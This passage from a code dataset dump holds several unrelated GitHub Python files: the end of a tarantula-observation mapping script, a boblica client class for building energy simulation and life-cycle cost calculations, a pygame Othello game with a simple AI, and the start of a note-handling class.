'Sacramento', 'lat_long'].iloc[0][1]),\n (city_info_df.loc[city_info_df['city'] == 'Sacramento', 'lat_long'].iloc[0][0]),\n 'Sacramento', color = 'black', fontsize=15)\n \n#give the plot a title and position the title \nfirst_year = '2018'\nlast_year = 'present'\nplt.title(f\"Tarantula observations in California\\n{first_year} to {last_year}\", \n fontsize = 20, weight='bold', loc = 'left', y=1.01)\n\n#add grid\n#ax.grid(b=True, alpha=0.5)\n\n#add legend\nblue_point = mlines.Line2D([], [], color='blue', marker='.', linestyle='None',\n markersize=15, label='observations')\ngrey_line = mlines.Line2D([], [], color='grey', marker='',\n markersize=15, label='county borders')\nyellow_patch = mpatches.Patch(color='yellow', label='State Parks')\ngreen_patch = mpatches.Patch(color='lightgreen', label='Wlderness Areas')\nax.legend(handles=[blue_point, grey_line, yellow_patch, green_patch],\n frameon=False,\n loc='upper right', bbox_to_anchor=(0.9, 0.95),\n #title='Legend', title_fontsize=18,\n fontsize = 12)\n\n#save the figure\nplt.savefig('YOUR FILE PATH/tarantualas_california.png', dpi=300)\n\n#display the plot\nplt.show()\n\n\n# In[11]:\n\n\nprint(\"Run time for your api request: %s seconds\" % (query_time))\nprint(\"Run time total: %s seconds\" % (time.time() - start_time))\n\n\n\n\n\n\n\n","repo_name":"Floydworks/Tarantulas_Map_iNat","sub_path":"Tarantulas_web.py","file_name":"Tarantulas_web.py","file_ext":"py","file_size_in_byte":10561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35254552076","text":"import logging\nimport shutil\nimport sys\nimport time\nimport traceback\nimport uuid\nfrom pathlib import Path\nfrom typing import MutableMapping, Mapping, Union, Callable, Tuple, List\n\nfrom eppy.modeleditor import IDF\nimport pandas as pd\n\nfrom boblica.calculation.energy import EnergyPlusSimulation, SteadyStateCalculation\nfrom boblica.tools.optimization import Parameter\nfrom boblica.model.building import Building\nfrom boblica.calculation.lca import LCACalculation, ImpactResult\nfrom boblica.calculation.cost import CostCalculation, CostResult\nfrom boblica.tools.serializer import IdfSerializer\n\nlogger = logging.getLogger(__name__)\n\n\nclass LocalClient:\n\n def __init__(self):\n self.name = None\n self.epw = None\n self.weather_data = None\n self.idf = None\n self.model = None\n self.parameters = None\n self.lca_calculation = None\n self.cost_calculation = None\n self.energy_calculation = None\n # extras for local mode\n self._results = None\n self.update_model = None\n self.evaluate = None\n\n self._idd_path = None\n self.idf_parser = None\n\n # args of the IdfSerializer.update_idf() method to be used in the update method:\n self.idf_update_options = {\n 'update_collections': True, # True / False\n 'zone_method': None, # 'recreate' / 'update' / None\n 'non_zone_surf_method': None, # 'recreate' / 'update' / None\n 'fenestration_method': 'recreate', # 'recreate' / 'update' / None\n 'surface_method': None, # 'recreate' / 'update' / None\n 'internal_mass_method': None # 'recreate' / 'update' / None\n }\n\n # args of the EnergyPlusSimulation.set_outputs() method by output type\n # as well as to the EnergyPlusSimulation.\n self.energy_calculation_options = {\n # what output to save during simulation\n 'outputs': {\n 'zone': [\n 'heating', # this is the minimum required by the lca calculation\n 'cooling', # this is the minimum required by the lca calculation\n # 'infiltration',\n # 'solar gains',\n # 'glazing loss',\n # 'opaque loss',\n # 'ventilation',\n 'lights', # this is the minimum required by the lca calculation\n # 'equipment',\n # 'people',\n ],\n 'surface': [\n # 'opaque loss',\n # 'glazing loss',\n # 'glazing gain',\n ]\n },\n # all lower resolutions will be saved\n 'output_resolution': 'runperiod', # 'runperiod' / 'annual' / 'monthly' / 'daily' / 'hourly' / 'timestep'\n 'clear_existing_variables': True\n }\n\n self.simulation_output_folder = None\n self.simulation = None\n self.steady_state = None\n\n @property\n def idd_path(self):\n return self._idd_path\n\n @idd_path.setter\n def idd_path(self, path: str):\n self._idd_path = path\n idd_path = Path(path)\n self.idf_parser = IdfSerializer(idd_path=idd_path)\n\n @property\n def results(self) -> pd.DataFrame:\n return self._results\n\n @results.setter\n def results(self, df: pd.DataFrame):\n self._results = df\n\n @property\n def energy_plus_path(self) -> str:\n return self._energy_plus_path\n\n @energy_plus_path.setter\n def energy_plus_path(self, path: Union[str, Path]):\n if isinstance(path, str):\n full_path = Path(path).absolute()\n else:\n full_path = path.absolute()\n self._energy_plus_path = full_path\n\n def setup(self,\n name: str,\n epw: Path = None,\n weather_data: Path = None,\n idf: IDF = None,\n model: Building = None,\n parameters: MutableMapping[str, Parameter] = None,\n lca_calculation: LCACalculation = None,\n cost_calculation: CostCalculation = None,\n energy_calculation: str = None,\n update_model_function: Callable[[MutableMapping[str, Parameter], Building], Building] = None,\n evaluate_function: Callable[[pd.DataFrame, pd.DataFrame, pd.DataFrame], pd.Series] = None,\n init_db: bool = True) -> str:\n \"\"\"\n Setup the server with the following options. The options can also be set independently.\n\n :param name: Name of the calculation setup tp create or update\n :param epw: Path to epw file for weather data for simulation\n :param weather_data: Path to csv weather data for steady state energy calculation\n :param idf: eppy IDF model of the building\n :param model: converted boblica model of the building\n :param parameters: dict of boblica Parameters to use for parametric definition\n :param lca_calculation:\n :param cost_calculation:\n :param energy_calculation: 'simulation' or 'steady_state'\n :param init_db: set True (default) to create results database for the setup\n :return: success message\n \"\"\"\n\n logger.info('Setting up calculation locally')\n self.name = name\n\n if epw is not None:\n logger.debug('Setting up EPW')\n self.epw = epw\n\n if weather_data is not None:\n logger.debug('Setting up weather data')\n weather = pd.read_csv(str(weather_data), header=[0, 1], index_col=[0, 1])\n self.weather_data = weather\n\n if idf is not None:\n logger.debug('Setting up IDF')\n self.idf = idf\n self.idf.epw = str(self.epw)\n self.idd_path = idf.iddname\n\n if model is not None:\n logger.debug('Setting up model')\n self.model = model\n\n if parameters is not None:\n logger.debug('Setting up parameters locally')\n self.parameters = parameters\n\n if lca_calculation is not None:\n logger.debug('Setting up LCA Calculation locally')\n self.lca_calculation = lca_calculation\n\n if cost_calculation is not None:\n logger.debug('Setting up Cost Calculation locally')\n self.cost_calculation = cost_calculation\n\n if init_db:\n logger.debug('Initiating result DataFrame')\n self._results = pd.DataFrame()\n\n if energy_calculation:\n if energy_calculation not in ['simulation', 'steady_state']:\n return 'Energy calculation type can be one of the following: simulation / steady_state'\n logger.debug('Setting up Energy Calculation type locally')\n self.energy_calculation = energy_calculation\n\n if energy_calculation == 'simulation':\n self.simulation_output_folder = Path(f\"./simulation_output\").absolute()\n self.simulation = EnergyPlusSimulation(typ='local',\n output_directory=str(self.simulation_output_folder),\n ep_exe_path=str(self.energy_plus_path))\n elif energy_calculation == 'steady_state':\n self.steady_state = SteadyStateCalculation()\n self.steady_state.weather_data = self.weather_data\n\n if update_model_function is not None:\n self.update_model = update_model_function\n\n if evaluate_function is not None:\n self.evaluate = evaluate_function\n\n return 'OK'\n\n def calculate(self, parameters: MutableMapping[str, Union[float, int, str]], name=None):\n \"\"\"\n Calculate the impact based on the parameters\n Model is updated, calculations are made and results are written into a local result DataFrame\n This is the entry point for external optimization algorithms\n\n :param name: Name of the calculation setup\n :param parameters: Parameters as a dict\n :return: result of the evaluation function as a dict\n \"\"\"\n # get the name of the calculation setup\n\n parameters, msg = self._update_params(parameters=parameters)\n\n try:\n # ----------------------- MODEL UPDATE --------------------------------\n model, idf = self._update_model(parameters=parameters)\n\n # ----------------------- CALCULATIONS --------------------------------\n tic = time.perf_counter()\n impact_result, cost_result, energy_result, sim_id = self._run(model=model, idf=idf,\n drop_sim_result=True)\n toc = time.perf_counter()\n\n # measure execution time\n exec_time = toc - tic\n\n # ----------------------- EVALUATION --------------------------------\n result = self.evaluate(impacts=impact_result.impacts, costs=cost_result.costs, energy=energy_result)\n\n except Exception as err:\n # if anything goes wrong return an invalid result value (e.g. infinity)\n logger.info('Calculation failed with error: {e}: {r}'.format(e=sys.exc_info()[0], r=err))\n logger.debug('Traceback: {tr}'.format(tr=traceback.format_exc()))\n\n result = self.evaluate()\n sim_id = 'failed'\n exec_time = float('inf')\n\n # -------------------- WRITE RESULTS TO DATABASE --------------------\n logger.info('Saving results to result DataFrame for: {id}'.format(id=sim_id))\n\n # collect updated parameters\n data = {p.name: p.value for p in parameters.values()}\n\n # Create pandas Series from parameters and results\n result_series = pd.Series(data=data, name=sim_id)\n result_series = result_series.append(result)\n result_series['calculation_id'] = sim_id\n result_series['calculation_time'] = exec_time\n result_series['timestamp'] = time.perf_counter()\n result_frame = result_series.to_frame().transpose()\n\n if self.results is None:\n self.results = result_frame\n else:\n self.results = self.results.append(result_frame, ignore_index=True)\n\n return result.to_dict()\n\n def _update_params(self,\n parameters: MutableMapping[str, Union[float, int, str]],\n calculation_id: str = None) -> Tuple[MutableMapping[str, Parameter], Union[str, None]]:\n \"\"\"\n\n Parameters\n ----------\n parameters\n calculation_id\n\n Returns\n -------\n\n \"\"\"\n\n msg = None\n\n if calculation_id is not None:\n try:\n db_values = self.results.loc[calculation_id, :]\n except KeyError:\n msg = 'No previous calculation found for id: {id}'.format(id=calculation_id)\n return self.parameters, msg\n else:\n db_values = {n: None for n in parameters.keys()}\n\n for par_name, param in self.parameters.items():\n if calculation_id is not None:\n # get value from previous calculations\n value = db_values[par_name]\n else:\n # get value from passed dictionary\n value = parameters[par_name]\n\n if value is None:\n msg = 'Missing value for parameter: {p}'.format(p=par_name)\n return self.parameters, msg\n\n # convert type of parameter\n try:\n if param.type == 'float':\n value = float(value)\n elif param.type == 'str':\n value = str(value)\n else:\n msg = 'Parameter type of {p} needs to be one of [\"str\", \"float\"], not {pt}'.format(\n pt=param.type, p=param.name\n )\n return self.parameters, msg\n except ValueError as e:\n msg = 'Parameter conversion failed: {e}'.format(e=e)\n return self.parameters, msg\n\n if param.limits != (None, None):\n minimum, maximum = param.limits\n if not minimum <= value <= maximum:\n msg = 'Parameter value {v} of {p} exceeds its limits: {lim}'.format(\n v=value, p=param.name, lim=param.limits\n )\n return self.parameters, msg\n\n if param.type == 'str' and param.options is not None:\n if value not in param.options:\n msg = 'Parameter value {v} of {p} is invalid, options are: {o}'.format(\n v=value, p=param.name, o=param.options\n )\n return self.parameters, msg\n\n # update parameter value\n param.value = value\n\n return self.parameters, msg\n\n def _update_model(self, parameters: MutableMapping[str, Parameter]) -> Tuple[Building, IDF]:\n\n logger.info('Updating model: {n}'.format(n=self.name))\n param_values = ['{n}: {v}'.format(n=name, v=p.value) for name, p in parameters.items()]\n logger.debug('Parameters: ' + '; '.join(param_values))\n\n # update the model\n self.model = self.update_model(parameters=parameters, model=self.model)\n\n # If idf is present, update idf too along with the model\n if self.idf is not None:\n logger.debug('Updating idf based on model: {n}'.format(n=self.name))\n\n self.idf_parser.idf = self.idf\n self.idf_parser.update_idf(model=self.model, **self.idf_update_options)\n\n return self.model, self.idf_parser.idf\n \n # Otherwise, return the model only, and None for idf\n else:\n return self.model, None\n\n def _run(self,\n model: Building,\n idf: IDF = None,\n simulation_id: str = None,\n simulation_options: MutableMapping = None,\n drop_sim_result: bool = False) -> Tuple[ImpactResult, CostResult, pd.DataFrame, str]:\n \"\"\"\n Run calculations with the model. Either idf or simulation_id is needed. If simulation_id is given, no\n simulation will run, existing results will be read\n :param name: name of the calculation setup\n :param model: Building model tu run calculation on\n :param idf: IDF representing the same model to use in simulation\n :param simulation_id: if simulation has been made before, the id of the simulation\n :param simulation_options: optional dictionary to pass to customize the simulation\n :param drop_sim_result: weather to keep the simulation results on the server or not\n :return: impact result, cost result, energy result and simulation id\n \"\"\"\n ENERGY_SIMULATION = self.simulation\n ENERGY_STEADY_STATE = self.steady_state\n name = self.name\n\n def run_simulation(options, sim_id=None):\n logger.info('Running simulation')\n\n frequency = options['output_resolution']\n if frequency is not None:\n ENERGY_SIMULATION.output_frequency = frequency\n\n ENERGY_SIMULATION.idf = idf\n\n if options['clear_existing_variables']:\n ENERGY_SIMULATION.clear_outputs()\n\n zone_outputs: List = options['outputs']['zone']\n logger.debug('Setting zone outputs: {}'.format(zone_outputs))\n if zone_outputs: # not an empty list\n ENERGY_SIMULATION.set_outputs(*zone_outputs, typ='zone')\n else: # this would never happen since we set the defaults above\n ENERGY_SIMULATION.set_outputs('heating', 'cooling', 'lights', typ='zone')\n\n surface_outputs: List = options['outputs']['surface']\n logger.debug('Setting surface outputs: {}'.format(surface_outputs))\n if surface_outputs: # not an empty list\n ENERGY_SIMULATION.set_outputs(*surface_outputs, typ='surface')\n\n if sim_id is not None:\n sim_id = ENERGY_SIMULATION.run(name=name, sim_id=sim_id)\n else:\n sim_id = ENERGY_SIMULATION.run(name=name)\n\n logger.info('Simulation ready, id: {sid}'.format(sid=sim_id))\n return sim_id\n\n # energy calculation\n if self.energy_calculation == 'simulation':\n if simulation_options is None:\n energy_calculation_options = self.energy_calculation_options\n else:\n energy_calculation_options = simulation_options\n\n # Add defaults to the specification\n if 'outputs' not in energy_calculation_options:\n energy_calculation_options['outputs'] = {\n 'zone': ['heating', 'cooling', 'lights'],\n 'surface': []\n }\n else:\n if 'zone' not in energy_calculation_options['outputs']:\n energy_calculation_options['outputs']['zone'] = ['heating', 'cooling', 'lights']\n else:\n if 'heating' not in energy_calculation_options['outputs']['zone']:\n energy_calculation_options['outputs']['zone'].append('heating')\n if 'cooling' not in energy_calculation_options['outputs']['zone']:\n energy_calculation_options['outputs']['zone'].append('cooling')\n if 'lights' not in energy_calculation_options['outputs']['zone']:\n energy_calculation_options['outputs']['zone'].append('lights')\n if 'surface' not in energy_calculation_options['outputs']:\n energy_calculation_options['outputs']['surface'] = []\n\n if 'output_resolution' not in energy_calculation_options:\n energy_calculation_options['output_resolution'] = 'runperiod'\n\n if 'clear_existing_variables' not in energy_calculation_options:\n energy_calculation_options['clear_existing_variables'] = False\n\n if simulation_id is not None:\n logger.info('Getting previous results for simulation with id: {sid}'.format(sid=simulation_id))\n response = ENERGY_SIMULATION.results(variables=['heating', 'cooling', 'lights'],\n name=name,\n sim_id=simulation_id,\n typ='zone', period='runperiod')\n\n if 'No result directory' in response:\n logger.info('No results found for id: {sid}, rerunning simulation...'.format(sid=simulation_id))\n simulation_id = run_simulation(options=energy_calculation_options, sim_id=simulation_id)\n\n logger.info('Getting results for simulation with id: {sid}'.format(sid=simulation_id))\n response = ENERGY_SIMULATION.results(variables=['heating', 'cooling', 'lights'],\n name=name,\n sim_id=simulation_id,\n typ='zone', period='runperiod')\n\n else:\n simulation_id = run_simulation(options=energy_calculation_options)\n\n logger.info('Getting results for simulation with id: {sid}'.format(sid=simulation_id))\n time.sleep(3)\n response = ENERGY_SIMULATION.results(variables=['heating', 'cooling', 'lights'],\n name=name,\n sim_id=simulation_id,\n typ='zone', period='runperiod')\n\n if isinstance(response, pd.DataFrame):\n energy_calc_results = response\n if drop_sim_result:\n logger.debug('Disposing result of simulation: {sid}'.format(sid=simulation_id))\n ENERGY_SIMULATION.drop_local_result(name=name, sim_id=simulation_id)\n else:\n error_message = 'EnergyPlus error: {t}'.format(t=response)\n logger.info(error_message)\n raise Exception(error_message)\n calculation_id = simulation_id\n\n elif self.energy_calculation == 'steady_state':\n calculation_id = str(uuid.uuid1())\n logger.info('Running steady state energy calculation with id: {id}'.format(id=calculation_id))\n\n energy_calc_results = ENERGY_STEADY_STATE.calculate(model)\n\n else:\n raise Exception('Energy calculation option \"{ec}\" not implemented.'.format(ec=self.energy_calculation))\n\n # TODO make impact and cost calculation optional\n # impact calculation\n logger.info('Calculating life cycle impact for: {id}'.format(id=calculation_id))\n\n self.lca_calculation.clear_cache()\n\n lca_result = self.lca_calculation.calculate_impact(model, demands=energy_calc_results)\n\n # cost calculation\n logger.info('Calculating life cycle costs for: {id}'.format(id=calculation_id))\n\n self.cost_calculation.clear_cache()\n\n cost_result = self.cost_calculation.calculate_cost(model, demands=energy_calc_results)\n\n return lca_result, cost_result, energy_calc_results, calculation_id\n\n def cleanup(self, target: str = None, calc_id: str = None) -> str:\n \"\"\"\n Cleanup server from stored data if target is not specified both will be deleted\n Prompts for confirmation\n\n Parameters\n ----------\n target\n 'results' / 'individuals' / 'simulations'\n calc_id\n the calculation id if 'individuals' option is selected\n\n Returns\n -------\n message\n\n \"\"\"\n\n if target == 'results' or target is None:\n logger.warning('Result data will be cleared for setup: {n}'.format(n=self.name))\n if target == 'individuals':\n if calc_id is None:\n logger.warning('All result for setup {n} will be cleared'.format(n=self.name))\n else:\n logger.warning('Individual result for setup {n} with id: {cid} will be cleared'.format(n=self.name,\n cid=calc_id))\n if target == 'simulations' or target is None:\n logger.warning('Simulation results will be deleted for setup: {n}'.format(n=self.name))\n\n if input('Are you sure? (y/n): ') == 'y':\n if target == 'results' or target is None:\n self._results = None\n if target == 'individuals':\n if calc_id is None:\n self._results = pd.DataFrame()\n else:\n self._results = self.results[self.results[\"calculation_id\"] != calc_id]\n if target == 'simulations' or target is None:\n shutil.rmtree(f'{self.simulation_output_folder}_{self.name}')\n return 'OK'\n else:\n logger.warning('Cleanup cancelled')\n\n def reinstate(self, name: str, calc_id: str) -> Mapping:\n \"\"\"\n Same as calculate() but the results are not saved to the database and the parameters are\n retrieved from the result database based on the calculation id\n Use this to update the state of the server to further analyse the model\n\n Parameters\n ----------\n name\n calc_id\n\n Returns\n -------\n\n \"\"\"\n\n # url = self.url + '/reinstate'\n # response = requests.get(url=url, params={'name': name, 'id': calc_id})\n # try:\n # return response.json()\n # except JSONDecodeError:\n # return response.text\n\n def instate(self, parameters: Mapping[str, Union[float, int, str]],\n options: Mapping = None) -> Mapping:\n \"\"\"\n Update state of server for the desired parameters and evaluate.\n Calculation results will not be saved to database.\n\n Parameters\n ----------\n parameters\n parameters as a dict to run calculation for\n options\n simulation options in the following patter\n {\n 'outputs': 'all' or {\n 'zone': [\n 'heating' / 'cooling' / 'lights' / 'infiltration' / 'solar gains' / 'glazing loss' /\n 'opaque loss' /'ventilation' / 'equipment' / 'people' ],\n 'surface': [\n 'opaque loss' / 'glazing loss' / 'glazing gain' ]\n },\n 'output_resolution': 'runperiod' / 'runperiod' / 'annual' / 'monthly' / 'daily' / 'hourly' / 'timestep',\n 'clear_existing_variables': True\n }\n Returns\n -------\n result, simulation id and calculation time in a dict\n\n \"\"\"\n\n # url = self.url + '/instate'\n # payload = {'name': name}\n # payload.update(parameters)\n # if options is not None:\n # response = requests.post(url=url, params=payload, data=json.dumps(options))\n # else:\n # response = requests.get(url=url, params=payload)\n # try:\n # return response.json()\n # except JSONDecodeError:\n # return response.text\n\n def get_params(self) -> Mapping:\n return {name: par.value for name, par in self.parameters.items()}\n\n def get_full_params(self, name=None) -> List[Parameter]:\n return [p for p in self.parameters.values()]\n\n def get_energy(self, calc_id: str = None,\n variables: List[str] = None,\n typ: str = 'zone',\n period: str = 'runperiod') -> pd.DataFrame:\n \"\"\"\n Retrieves the energy calculation results from the server. If steady state calculation is used,\n the result is a DataFrame with columns: 'heating' 'cooling', 'lights. If simulation is used,\n the result is specified with the other input parameters\n\n Parameters\n ----------\n name\n calc_id\n id of a previously run simulation (omitted is steady state calculation)\n variables\n variables to get from the simulation (omitted is steady state calculation)\n typ\n 'zone' (default) / 'surface' / 'balance' (omitted is steady state calculation)\n period\n 'runperiod' (default) / 'annual' / 'monthly' / 'daily' / 'hourly' / 'timestep'\n (omitted is steady state calculation)\n Returns\n -------\n DataFrame\n with the requested data\n\n \"\"\"\n\n # url = self.url + '/energy'\n # if variables is None:\n # variables = ['heating', 'cooling', 'lights']\n # response = requests.get(url=url, params={'name': name,\n # 'id': calc_id,\n # 'variables': variables,\n # 'type': typ,\n # 'period': period})\n # try:\n # df = pd.read_json(response.json(), orient='split')\n # return df\n # except JSONDecodeError:\n # return response.text\n\n def get_energy_detailed(self, calc_id: str,\n variable: str,\n typ: str,\n period: str) -> pd.DataFrame:\n \"\"\"\n Get the detailed energy results as a DataFrame\n Parameters\n ----------\n calc_id\n variable\n typ\n period\n\n Returns\n -------\n\n \"\"\"\n # url = self.url + '/energy/detailed'\n #\n # response = requests.get(url=url, params={'name': name,\n # 'id': calc_id,\n # 'variable': variable,\n # 'type': typ,\n # 'period': period})\n # try:\n # df = pd.read_json(response.json(), orient='split')\n # return df\n # except JSONDecodeError:\n # return response.text\n\n def get_idf(self) -> IDF:\n \"\"\"\n Return the actual eppy IDF object\n\n Returns\n -------\n\n \"\"\"\n\n","repo_name":"KBeno/boblica","sub_path":"boblica/app/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":28580,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"6042916844","text":"'''\r\nClasses needed:\r\n - Stone\r\n - Board\r\n - Player\r\n'''\r\n\r\nimport random, sys, pygame, time, copy, itertools\r\nfrom pygame.locals import *\r\n\r\n#Global Parameters\r\nWHITE = (255,255,255)\r\nBLACK = ( 0, 0, 0)\r\nSCREEN_SIZE_X = 800\r\nSCREEN_SIZE_Y = 1000\r\nBOX_LEN = 100\r\nSCREEN = pygame.display.set_mode((SCREEN_SIZE_X,SCREEN_SIZE_Y),0,32)\r\nFPS = 60\r\nFPS_CLOCK = pygame.time.Clock()\r\n\r\nBLACK_PLAYER = True\r\nWHITE_PLAYER = False\r\n\r\nBLACK_STONE = pygame.image.load('BlackStone.png')\r\nWHITE_STONE = pygame.image.load('WhiteStone.png')\r\n\r\nclass StoneTile:\r\n def __init__(self, x, y):\r\n self.pos_x = x\r\n self.pos_y = y\r\n self.parity = None #i.e. whether it's black (True) XOR white (False)\r\n self.sprite = pygame.image.load('StoneBackground.png')\r\n self.length = 100 #This is the size of the box in pixels\r\n\r\n def Draw(self):\r\n SCREEN.blit(self.sprite, (self.pos_x,self.pos_y))\r\n\r\n def Flip(self):\r\n self.parity = not self.parity\r\n if self.parity: #i.e. black\r\n self.sprite = BLACK_STONE\r\n else: #i.e. white\r\n self.sprite = WHITE_STONE\r\n\r\n def RemoveStone(self): #initialises the board again\r\n self.parity = None\r\n self.sprite = pygame.image.load('StoneBackground.png')\r\n\r\n def AddStone(self, player):\r\n if player == BLACK_PLAYER:\r\n self.parity = BLACK_PLAYER\r\n self.sprite = BLACK_STONE\r\n else:\r\n self.parity = WHITE_PLAYER\r\n self.sprite = WHITE_STONE\r\n\r\n def Flip(self):\r\n self.parity = not self.parity\r\n if self.parity == BLACK_PLAYER:\r\n self.sprite = BLACK_STONE\r\n else:\r\n self.sprite = WHITE_STONE\r\n\r\n def ClickInRange(self, pos_tuple):\r\n if (pos_tuple[0] in range(self.pos_x, self.pos_x+self.length+1)) and (pos_tuple[1] in range(self.pos_y, self.pos_y+self.length+1)):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nclass Board:\r\n def __init__(self):\r\n self.board = self._InitBoard()\r\n self.black_pieces = 0\r\n self.white_pieces = 0\r\n\r\n def Draw(self):\r\n for i in self.board:\r\n for tile in i:\r\n tile.Draw()\r\n\r\n def _InitBoard(self):\r\n #Filling the board with blank squares\r\n full_board = []\r\n temp_board = []\r\n for x in range(0,800, 100):\r\n for y in range(0, 800, 100):\r\n temp_board.append(StoneTile(x,y))\r\n full_board.append(temp_board)\r\n temp_board = []\r\n #Initialising the board with a white black pattern in the middle\r\n full_board[3][3].AddStone(WHITE_PLAYER)\r\n full_board[4][4].AddStone(WHITE_PLAYER)\r\n full_board[3][4].AddStone(BLACK_PLAYER)\r\n full_board[4][3].AddStone(BLACK_PLAYER)\r\n return full_board\r\n\r\n def Full(self): #Returns true if the board is full\r\n for i in self.board:\r\n for tile in i:\r\n if tile.parity == None:\r\n return False\r\n return True\r\n\r\n def AllSameColour(self):\r\n initial_tile = None\r\n for i in self.board:\r\n for tile in i:\r\n if (initial_tile == None) and ((tile.parity == BLACK_PLAYER) or (tile.parity == WHITE_PLAYER)):\r\n intial_tile = tile.parity\r\n if (tile.parity != None) and (tile.parity != intial_tile):\r\n return False\r\n return True\r\n\r\n def _OnBoard(self, x,y): #This method checks if the x and y values are in the range()\r\n return (x in range(7)) and (y in range(7))\r\n\r\n def _TileAlreadyOnBoard(self, tile):\r\n for i in self.board:\r\n for stone in i:\r\n if stone == tile:\r\n return True\r\n return False\r\n\r\n def AvailablePlaces(self, tile, player): #This method returns a list of the stones to flip\r\n if not self._TileAlreadyOnBoard(tile):\r\n return self.FlipStones(tile,player)\r\n return False\r\n\r\n def FlipStones(self, tile, player): #This method returns a list of the stones to flip\r\n #initially add the tile to the board for this to work\r\n tile.AddStone(player)\r\n \r\n tiles_to_flip = []\r\n x_initial, y_initial = self._Index2d(tile)\r\n for x_direction, y_direction in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]:\r\n x, y = x_initial, y_initial\r\n\r\n x += x_direction\r\n y += y_direction\r\n if self._OnBoard(x,y) and (self.board[x][y].parity == (not player)): #i.e. traversing board so long as\r\n #the opposite colour is present\r\n #and you haven't fallen off the board\r\n x += x_direction\r\n y += y_direction\r\n\r\n if not self._OnBoard(x, y): #if you're off the board, then you can skip this iteration\r\n continue\r\n \r\n while (self.board[x][y].parity != player):\r\n x += x_direction\r\n y += y_direction\r\n if not self._OnBoard(x,y): #i.e. you run into a straight line of stones of the opposite parity\r\n break\r\n\r\n if not self._OnBoard(x,y): #skips forward to the next iteration of the for loop\r\n continue\r\n \r\n if (self.board[x][y].parity == player):\r\n #Now we go backwards to the original stone appending the intermediate stones\r\n #to the flip list\r\n while True:\r\n x -= x_direction\r\n y -= y_direction\r\n if ((x==x_initial) and (y == y_initial)):\r\n break\r\n tiles_to_flip.append(self.board[x][y])\r\n tile.RemoveStone()\r\n\r\n if len(tiles_to_flip)==0: #i.e. the move is invalid so you can't flip anything\r\n return False\r\n return tiles_to_flip\r\n \r\n \r\n def Update(self, pos_tuple, player):\r\n for i in self.board:\r\n for tile in i:\r\n has_been_clicked = tile.ClickInRange(pos_tuple)\r\n if has_been_clicked:\r\n if (tile.parity == None): #i.e. if the space is free\r\n flip_tiles = self.FlipStones(tile, player) #Gets the stones to flip\r\n if (flip_tiles != False): #if the move is actually valid\r\n tile.AddStone(player)\r\n if tile in flip_tiles:\r\n flip_tiles.remove(tile)\r\n #Flip the stones\r\n for stone in flip_tiles:\r\n stone.Flip()\r\n #Updates score for AI and player\r\n self._UpdateScore()\r\n return True\r\n else: #i.e you don't rotate the player\r\n return False\r\n\r\n def _Index2d(self, tile): #returns the index of a tile in the form (row_num,column_num)\r\n for i, x in enumerate(self.board):\r\n if tile in x:\r\n return i, x.index(tile)\r\n\r\n def _UpdateScore(self):\r\n b = w = 0\r\n for row in self.board:\r\n for tile in row:\r\n if tile.parity == BLACK_PLAYER:\r\n b += 1\r\n elif tile.parity == WHITE_PLAYER:\r\n w += 1\r\n self.black_pieces = b\r\n self.white_pieces = w\r\n\r\ndef init(): #Just a basic function used to make the program logic clearer\r\n pygame.init()\r\n SCREEN.fill(WHITE)\r\n pygame.display.set_caption('Othello')\r\n \r\n \r\ndef OutputOnScreen(message, pos = (100,100), font_size = 30):\r\n temp_font = 'Times New Roman'\r\n my_font = pygame.font.SysFont(temp_font, font_size)\r\n my_message = my_font.render(message, 1, BLACK)\r\n SCREEN.blit(my_message, pos)\r\n \r\ndef Stats(black_pieces, white_pieces):\r\n #Outputting player's stats\r\n OutputOnScreen('Player ', (30,830))\r\n black = pygame.image.load('BlackStoneEmpty.png')\r\n SCREEN.blit(black,(115,820))\r\n OutputOnScreen('Pieces:' + str(black_pieces), (300,830))\r\n \r\n #Outputting the AI's stats\r\n OutputOnScreen('AI ', (70,920))\r\n white = pygame.image.load('WhiteStoneEmpty.png')\r\n SCREEN.blit(white,(115,910))\r\n OutputOnScreen('Pieces: ' + str(white_pieces), (300,920))\r\n\r\ndef AIGuess(board, player): #randomly returns a position unless a corner is available\r\n if board.Update((50,50), player):\r\n return\r\n elif board.Update((50,750), player):\r\n return\r\n elif board.Update((750,50), player):\r\n return \r\n elif board.Update((750,750), player):\r\n return\r\n else: #Check all other positions\r\n for x in range(8):\r\n for y in range(8):\r\n if board.Update(((x*100)+50,(y*100)+50), player):\r\n return #break out of the function\r\n\r\ndef GameOver(board, player):\r\n total_num_of_moves = 0\r\n for i in board.board:\r\n for tile in i:\r\n if tile.parity == None:\r\n x = board.AvailablePlaces(tile, player) #why is this returning false\r\n if isinstance(x, list):\r\n total_num_of_moves += len(x)\r\n if total_num_of_moves == 0:\r\n OutputOnScreen('GAME OVER', (100,100), 75)\r\n \r\n \r\nif __name__ == '__main__':\r\n #intialising the game\r\n init()\r\n B = Board()\r\n player = BLACK_PLAYER\r\n AI = WHITE_PLAYER\r\n player_turn = player\r\n running = True\r\n \r\n while running: #main game loop\r\n #GameOver(B, player_turn)\r\n SCREEN.fill(WHITE)\r\n B.Draw() #Drawing the board on a blank canvas at every iteration of the clock\r\n Stats(B.black_pieces, B.white_pieces)\r\n \r\n for event in pygame.event.get():\r\n\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n if player_turn == AI:\r\n AIGuess(B, player_turn)\r\n player_turn = player\r\n\r\n elif (player_turn == player) and (event.type == pygame.MOUSEBUTTONDOWN):\r\n pos = (PosX, PosY) = pygame.mouse.get_pos()\r\n if B.Update(pos, player_turn):\r\n player_turn = AI #i.e. if it was the black player, it's now the white player and vise-versa\r\n \r\n pygame.display.update()\r\n FPS_CLOCK.tick(FPS)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"Doberman0/in2Science","sub_path":"FlippyOthello/Othello.py","file_name":"Othello.py","file_ext":"py","file_size_in_byte":10738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32083319270","text":"import os\nimport click\nfrom .utils import Utils\n\n\nclass Note:\n \"\"\"\n Note class. Responsible for handling note path\n validation and fetching filenames\n\n :param directory: directory of the mindspace\n :param name: name of the note\n \"\"\"\n\n def __init__(self, directory, name):\n self.directory = directory\n 